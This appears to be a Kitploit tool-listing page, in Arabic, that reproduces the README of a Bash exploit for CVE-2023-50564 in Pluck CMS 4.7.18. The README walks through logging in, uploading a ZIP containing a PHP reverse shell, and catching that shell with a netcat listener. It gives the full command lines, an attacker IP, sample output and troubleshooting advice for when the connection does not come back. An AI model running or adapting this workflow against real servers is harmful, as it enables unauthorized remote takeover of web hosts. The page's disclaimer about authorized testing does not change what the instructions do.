Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — استغلال Bash لأتمتة تنفيذ التعليمات البرمجية عن بُعد المصادق عليه في Pluck CMS 4.7.18 عبر تحميل ZIP خبيث، مما يؤدي إلى تشغيل قشرة PHP عكسية لـ CVE-2023-50564. | Kitploit
أدوات/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

استغلال Bash لأتمتة تنفيذ التعليمات البرمجية عن بُعد المصادق عليه في Pluck CMS 4.7.18 عبر تحميل ZIP خبيث، مما يؤدي إلى تشغيل قشرة PHP عكسية لـ CVE-2023-50564.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
14منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

CVE-2023-50564 - ثغرة تنفيذ الأوامر عن بعد (RCE) في Pluck CMS v4.7.18

الوصف

يستغل هذا السكريبت ثغرة تنفيذ الأوامر عن بعد (RCE) في Pluck CMS v4.7.18. تسمح الثغرة لمستخدم خبيث برفع ملف PHP ضار إلى الخادم وتنفيذه، مما يمنحه تحكماً عن بعد في الجهاز الهدف.

يقوم السكريبت بأتمتة العملية بأكملها من خلال:

  1. تسجيل الدخول إلى لوحة تحكم Pluck CMS باستخدام بيانات الاعتماد المقدمة.
  2. رفع ملف ZIP يحتوي على نص PHP خاص بـ reverse shell خبيث.
  3. تنفيذ reverse shell PHP، مما يمنح المهاجم وصولاً عن بعد إلى الجهاز الهدف.

ملاحظة: يتطلب السكريبت وجود مستمع Netcat على جهاز المهاجم لاستقبال الـ reverse shell.


المتطلبات الأساسية

قبل تشغيل السكريبت، تأكد مما يلي:

  • تثبيت Netcat وإعداد مستمع لاستقبال الـ reverse shell.
  • امتلاك الـ host الصحيح للهدف، كلمة المرور، عنوان IP، والمنفذ الخاص بالـ reverse shell.
  • امتلاك صلاحية الوصول إلى لوحة تحكم Pluck CMS على الهدف.

الاستخدام

./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>

الوسائط:

  • -h <host>: المضيف الهدف (مثال: greenhorn.htb).
  • -P <password>: كلمة المرور للوحة تحكم Pluck CMS (مثال: abcd123).
  • -i <IP>: عنوان IP الخاص بالمهاجم لاستقبال الـ reverse shell.
  • -p <port>: المنفذ الذي يعمل عليه مستمع Netcat لالتقاط الـ reverse shell.

مثال:

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

الخطوات:

  1. إعداد مستمع Netcat: على جهاز المهاجم، ابدأ مستمع Netcat على المنفذ المحدد:

    nc -nvlp <port>
    

    على سبيل المثال:

    nc -nvlp 9001
    
  2. تشغيل السكريبت: قدم الوسائط المطلوبة للسكريبت، بما في ذلك المضيف، كلمة المرور، عنوان IP، والمنفذ.

    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. تنفيذ السكريبت:

    • يقوم السكريبت بتسجيل الدخول إلى لوحة تحكم Pluck CMS.
    • يقوم برفع ملف ZIP يحتوي على نص PHP للـ reverse shell (love.php).
    • بمجرد رفع ملف ZIP، يتم تنفيذ الـ reverse shell على الهدف، ويتم إنشاء اتصال بمستمع Netcat الخاص بك.
    • ستظهر رسالة نظيفة: "RCE is waiting for you, please go take a look."، وسينتهي السكريبت بعد تتبع الوقت المستغرق.
  4. الوصول إلى الهدف: بمجرد تشغيل الـ reverse shell، سيظهر الاتصال في مستمع Netcat الخاص بك، مما يمنحك وصولاً عن بعد إلى الجهاز الهدف.


إثبات المفهوم (PoC)

image

مثال على الإخراج

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

المتطلبات

  • cURL: للتفاعل مع Pluck CMS ورفع الملفات.
  • Netcat: للاستماع للـ reverse shell.

يمكنك تثبيت curl و netcat باستخدام الأوامر التالية إذا لم يكونا مثبتين:

Debian/Ubuntu:

sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

sudo yum install curl nc

إخلاء المسؤولية

هذا السكريبت مخصص لأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به لهذا السكريبت غير قانوني وغير أخلاقي. احصل دائمًا على التصريح المناسب قبل استغلال أي ثغرة على نظام ما.


استكشاف الأخطاء وإصلاحها

  1. خطأ 504 Gateway Time-out: قد يواجه السكريبت هذا الخطأ عند محاولة تنفيذ الـ reverse shell، لكنه لا يؤثر على نجاح تنفيذ الصدفة. يحدث الخطأ عادةً بسبب استغراق الخادم الهدف وقتًا طويلاً للرد على طلب HTTP، لكن الصدفة يجب أن تظل تعمل.

  2. مشاكل مستمع Netcat: إذا لم تستقبل الـ reverse shell، تأكد من أن عنوان IP والمنفذ مضبوطان بشكل صحيح، وأنه لا توجد قيود جدار حماية تمنع الهدف من الاتصال بجهازك.

  3. فشل السكريبت في تسجيل الدخول: إذا فشل تسجيل الدخول إلى لوحة تحكم CMS، تحقق من كلمة المرور المقدمة وتأكد من أن النظام متاح على الجهاز الهدف.


أخبرني إذا كنت ترغب في أي تخصيص إضافي أو توضيح في ملف README!

تنزيل الأداة